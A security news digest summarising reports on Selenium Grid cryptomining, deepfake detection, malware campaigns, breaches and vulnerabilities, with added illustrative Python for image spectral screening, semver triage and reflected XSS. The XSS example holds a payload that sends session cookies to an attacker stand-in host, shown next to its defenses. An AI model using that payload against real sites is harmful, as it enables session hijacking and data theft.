"Hackers Proxyjack & Cryptomine Selenium Grid Servers"

Threat actors have been infecting Internet-exposed Selenium Grid servers to use victims' computing resources and Internet bandwidth for cryptomining, proxyjacking, and more. Wiz reports that 30 percent of cloud environments use Selenium, an open source suite of tools for browser automation. Millions of developers and thousands of organizations use Selenium Grid, an open source tool for automatically testing web applications across multiple platforms and browsers in parallel. Attackers have been running automated campaigns that hijack Internet-reachable Selenium Grid servers for these purposes.

Submitted by Gregory Rigby on

"New Tools Use AI 'Fingerprints' to Detect Altered Photos, Videos"

Digitally manipulated "deepfake" photos and videos are becoming increasingly hard to spot as Artificial Intelligence (AI) networks improve and become more accessible. New research led by Binghamton University breaks images down using frequency domain analysis techniques and identifies anomalies indicating that AI generated them. The study compared real and fake images. The researchers created thousands of images with Adobe Firefly, PIXLR, DALL-E, and other generative AI tools, then analyzed them using signal processing to understand their frequency domain features.
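The frequency-domain idea in plain code, as an added illustration that is not the Binghamton team's tool or method: take the 2-D Fourier transform of a grayscale image, discard the DC term, and summarise how the power is distributed by distance from DC. The radial profile is the "fingerprint", and the fraction of energy above a cutoff radius is a single number that can be compared against a reference set. The two test images and the reference set are constructed here (a smooth low-frequency image versus the same image with fine-grained texture), and the pure-Python DFT exists only so the block runs without numpy; a real pipeline would use a FFT library and a large labelled corpus.

```python
import cmath
import math


def dft2(img):
    """Separable 2-D DFT of a square grayscale image (list of rows of floats).
    Deliberately naive so the example runs with the standard library only."""
    n = len(img)
    twiddle = [[cmath.exp(-2j * math.pi * k * x / n) for x in range(n)] for k in range(n)]
    rows = [[sum(twiddle[k][x] * row[x] for x in range(n)) for k in range(n)] for row in img]
    out = [[0j] * n for _ in range(n)]
    for k in range(n):          # vertical frequency index
        for l in range(n):      # horizontal frequency index
            out[k][l] = sum(twiddle[k][y] * rows[y][l] for y in range(n))
    return out


def _wrap(k, n):
    """Map a DFT bin index to a signed frequency so radius is measured from DC."""
    return k if k <= n // 2 else k - n


def power_by_radius(img):
    """Sum |F|^2 into integer radius bins around DC; DC itself is dropped."""
    n = len(img)
    spec = dft2(img)
    energy, count = {}, {}
    for k in range(n):
        for l in range(n):
            r = int(round(math.hypot(_wrap(k, n), _wrap(l, n))))
            if r == 0:
                continue
            energy[r] = energy.get(r, 0.0) + abs(spec[k][l]) ** 2
            count[r] = count.get(r, 0) + 1
    return energy, count


def radial_profile(img):
    """Mean log-power per radius: the 1-D spectral fingerprint compared across images."""
    energy, count = power_by_radius(img)
    return [math.log10(energy[r] / count[r] + 1e-12) for r in sorted(energy)]


def high_freq_ratio(img, cutoff=None):
    """Share of non-DC spectral energy at radius >= cutoff (default n/4)."""
    n = len(img)
    cutoff = cutoff if cutoff is not None else n // 4
    energy, _ = power_by_radius(img)
    total = sum(energy.values())
    high = sum(e for r, e in energy.items() if r >= cutoff)
    return high / total if total else 0.0


def screen(img, reference_imgs, z_limit=3.0):
    """Flag an image whose high-frequency ratio is far from a reference set.
    The reference set stands in for the labelled images a real detector is tuned on."""
    refs = [high_freq_ratio(r) for r in reference_imgs]
    mean = sum(refs) / len(refs)
    std = math.sqrt(sum((v - mean) ** 2 for v in refs) / len(refs)) or 1e-9
    z = (high_freq_ratio(img) - mean) / std
    return abs(z) > z_limit, z


# Constructed test data (not images from the study).
def _clamp(v):
    return max(0.0, min(255.0, v))


def _lcg(seed):
    state = seed
    while True:
        state = (1103515245 * state + 12345) % 2 ** 31
        yield state / 2 ** 31


def make_smooth(n=32):
    """Only the lowest spatial frequencies: a sine across x plus a cosine down y."""
    return [[_clamp(128 + 50 * math.sin(2 * math.pi * x / n) + 30 * math.cos(2 * math.pi * y / n))
             for x in range(n)] for y in range(n)]


def make_textured(n=32, seed=7):
    """The same smooth image with deterministic pixel-level noise on top."""
    rnd = _lcg(seed)
    return [[_clamp(v + 160 * (next(rnd) - 0.5)) for v in row] for row in make_smooth(n)]
```

The cutoff, the reference set and the 3-sigma rule are illustrative choices; the point of the block is the shape of the analysis (transform, radial binning, comparison against known-real statistics), not a claim about which direction generated images deviate in.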

Submitted by Gregory Rigby on

"Google's AI Model Faces European Union Scrutiny From Privacy Watchdog"

European Union regulators are investigating one of Google's Artificial Intelligence (AI) models due to concerns about its compliance with data privacy rules. Ireland's Data Protection Commission is looking into Google's Pathways Language Model 2 (PaLM2). It is part of a larger effort, including other national watchdogs across the 27-nation bloc, to delve into how AI systems handle personal data. This article continues to discuss Ireland's Data Protection Commission opening an inquiry into Google's PaLM2.

Submitted by Gregory Rigby on

"Beware: New Vo1d Malware Infects 1.3 Million Android TV Boxes Worldwide"

A new malware named "Vo1d" has infected about 1.3 million Android-based TV boxes running outdated operating systems and owned by users in 197 countries. The antivirus vendor Doctor Web described it as a backdoor that hides its components in the system storage area and, when commanded by attackers, secretly downloads and installs third-party software. Most infections are in Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia.

Submitted by Gregory Rigby on

"Lazarus Group Targets Developers in Fresh VMConnect Campaign"

According to ReversingLabs, "Lazarus Group" is continuing its "VMConnect" campaign by distributing new malicious software packages to developers via open source repositories. The North Korean group masqueraded as Capital One employees and used fake job interviews to trick developers into downloading the malware. The malware installs malicious downloaders on developer systems that can fetch second and third-stage malware, such as backdoors and infostealers. This article continues to discuss findings regarding the continued VMConnect campaign.

Submitted by Gregory Rigby on

"Iranian Hackers Targeting Iraqi Government: Security Firm"

According to researchers at Check Point, hackers suspected of operating on behalf of the Iranian government have been targeting Iraqi government networks. Check Point found Iran conducting cyber espionage operations against various Iraqi entities, including the government. The attacks use custom malware and infrastructure designed for specific targets, with links to known threat actors previously associated with Iran's Ministry of Intelligence and Security (MOIS).

Submitted by Gregory Rigby on

"Open Source Updates Have 75% Chance of Breaking Apps"

According to Endor Labs, about 95 percent of version upgrades of open source software include at least one breaking change that causes other components to fail. Even patch-level updates have a 75 percent chance of introducing a break. The problem is exacerbated by the finding that a quarter of vulnerable components require a major version update to reach a fixed release, which is where breaking changes are most likely. This article continues to discuss key findings from Endor Labs' "Dependency Management Report."
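One practical consequence of the finding above is that a vulnerability-fix list should be triaged by how far each upgrade travels under semantic versioning before anyone runs a blanket update. The block below is an added example, not tooling from Endor Labs or from the report; the package names and version pairs are constructed. It treats a minor bump on a 0.x line as breaking, which is how most ecosystems read the semver convention for unstable lines, and it counts major bumps separately so they can be scheduled as real migration work.

```python
import re
from collections import Counter

# Semantic version: MAJOR.MINOR.PATCH with optional pre-release and build metadata.
_SEMVER = re.compile(
    r"^v?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)"
    r"(?:-(?P<pre>[0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$"
)


def parse_version(text):
    """Return (major, minor, patch) as integers; pre-release and build tags are ignored."""
    m = _SEMVER.match(text.strip())
    if not m:
        raise ValueError(f"not a semantic version: {text!r}")
    return (int(m["major"]), int(m["minor"]), int(m["patch"]))


def upgrade_kind(current, target):
    """Classify the jump from current to target: none, downgrade, patch, minor or major.
    A 0.x line is treated as unstable, so a minor bump there counts as major (breaking)."""
    c, t = parse_version(current), parse_version(target)
    if t == c:
        return "none"
    if t < c:
        return "downgrade"
    if t[0] != c[0] or (c[0] == 0 and t[1] != c[1]):
        return "major"
    if t[1] != c[1]:
        return "minor"
    return "patch"


def triage(findings):
    """findings: iterable of (package, installed_version, first_fixed_version).
    Returns the per-package rows plus a count per upgrade kind."""
    rows = [(pkg, cur, fix, upgrade_kind(cur, fix)) for pkg, cur, fix in findings]
    return rows, Counter(kind for *_, kind in rows)


# Constructed sample findings, not real advisory data.
SAMPLE_FINDINGS = [
    ("libalpha", "1.4.2", "1.4.3"),    # patch: lowest risk, still not zero per the report
    ("libbeta", "2.0.0", "2.3.0"),     # minor
    ("libgamma", "3.9.1", "4.0.0"),    # major: plan a migration, not a blind bump
    ("libdelta", "0.7.2", "0.8.0"),    # 0.x minor bump: treated as major
    ("libepsilon", "5.1.0", "5.1.0"),  # already fixed
]

if __name__ == "__main__":
    rows, summary = triage(SAMPLE_FINDINGS)
    for pkg, cur, fix, kind in rows:
        print(f"{pkg:12} {cur:>8} -> {fix:<8} {kind}")
    print(dict(summary))
```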

Submitted by Gregory Rigby on

"Fortinet Confirms Data Breach After Hacker Claims to Steal 440GB of Files"

Cybersecurity giant Fortinet has confirmed it suffered a data breach after a threat actor claimed to have stolen 440GB of files from the company's Microsoft SharePoint server. Fortinet is one of the largest cybersecurity companies in the world. Early this morning, a threat actor posted to a hacking forum that they had stolen 440GB of data from Fortinet's Azure SharePoint instance. The threat actor then shared credentials to an S3 bucket where the stolen data is allegedly stored for other threat actors to download.

Submitted by Adam Ekwall on

"Gallup Cross-Site Scripting Error Could Have Led to Data Theft"

Checkmarx reports that Gallup fixed two Cross-Site Scripting (XSS) flaws on its website that could have resulted in data theft and account takeovers. Gallup is known for its public opinion polls, including polls regarding US politics and elections. An attacker could have exploited the XSS flaws by tricking victims into clicking links that pointed at the legitimate Gallup website but carried a malicious payload, leading to data extraction or session hijacking. This article continues to discuss the Gallup XSS flaws and the impact they could have had.
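The attack shape described above, reflected XSS delivered through a link to the legitimate site, as an added example that is not Gallup's code and does not reproduce the specific flaws Checkmarx found: a page that reflects a search parameter raw next to the same page with the parameter escaped for both text and attribute context, plus the response headers that limit the damage of a missed escape. The URL, parameter name, payload and cookie value are constructed placeholders.

```python
import html
from urllib.parse import urlencode


def render_search_vulnerable(query):
    """Reflects the raw parameter into the page: classic reflected XSS."""
    return f'<h1>Results for {query}</h1><input name="q" value="{query}">'


def render_search_safe(query):
    """html.escape with quote=True also neutralises the attribute context (" and ')."""
    safe = html.escape(query, quote=True)
    return f'<h1>Results for {safe}</h1><input name="q" value="{safe}">'


def build_response(body, session_token):
    """Defence in depth for the session-hijacking angle: script that does run cannot
    read an HttpOnly cookie, and a CSP without 'unsafe-inline' blocks injected inline
    script even if an escape is missed somewhere."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": f"session={session_token}; HttpOnly; Secure; SameSite=Lax",
    }
    return headers, body


# Constructed payload: closes the value="" attribute, then exfiltrates the cookie.
PAYLOAD = '"><script>location="https://attacker.example/?c="+document.cookie</script>'


def attacker_link(payload, base="https://www.example.com/search"):
    """The lure: a link to the legitimate site with the payload riding in the query
    string. base is a placeholder, not a real Gallup URL."""
    return base + "?" + urlencode({"q": payload})


def script_survives(rendered):
    """True if the payload reaches the page as a live <script> element."""
    return "<script>" in rendered


if __name__ == "__main__":
    print(attacker_link(PAYLOAD))
    print("vulnerable:", script_survives(render_search_vulnerable(PAYLOAD)))
    print("hardened:  ", script_survives(render_search_safe(PAYLOAD)))
```

Escaping is context-specific: the same `html.escape` call is not sufficient inside a JavaScript string, a URL attribute or a CSS block, which is why template engines with autoescaping and a restrictive CSP are the sustainable fix rather than hand-placed escapes.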

Submitted by Gregory Rigby on

"GitLab Warns of Critical Pipeline Execution Vulnerability"

GitLab has released critical updates for multiple vulnerabilities, one of which enables an attacker to trigger pipelines as arbitrary users under certain conditions. As part of GitLab's Continuous Integration/Continuous Delivery (CI/CD) system, the pipelines are automated workflows used in the building, testing, and deployment of code. They automate repetitive tasks and ensure codebase changes are tested and deployed consistently. The critical vulnerability can allow an attacker to execute environment stop actions as the owner of the stop action job.

Submitted by Gregory Rigby on